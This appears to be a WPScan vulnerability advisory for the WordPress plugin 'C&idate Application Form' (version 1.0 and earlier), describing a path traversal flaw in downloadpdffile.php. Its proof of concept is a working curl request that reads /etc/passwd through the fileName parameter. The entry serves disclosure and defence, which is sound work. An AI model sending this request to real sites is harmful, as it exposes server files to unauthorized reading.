C&idate Application Form <= 1.0 - Arbitrary File Download

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The code in downloadpdffile.php does not do any sanity checks, allowing a remote attacker to download sensitive system files.
Proof of Concept
$ curl http://www.example.com/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd

Affects

Plugin candidate-application-form

References

EXPLOITDB 37754
PACKETSTORM 132960
URL http://www.vapid.dhs.org/advisory.php?v=142

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Submitter Larry W. Cashdollar
Submitter Website http://www.vapid.dhs.org
Submitter Twitter _larry0
Views 139
Verified Yes
WPVDB ID 8099

Timeline

Publicly Published 2015-07-12 (over 1 year ago)
Added 2015-07-14 (over 1 year ago)
Last Updated 2015-08-12 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.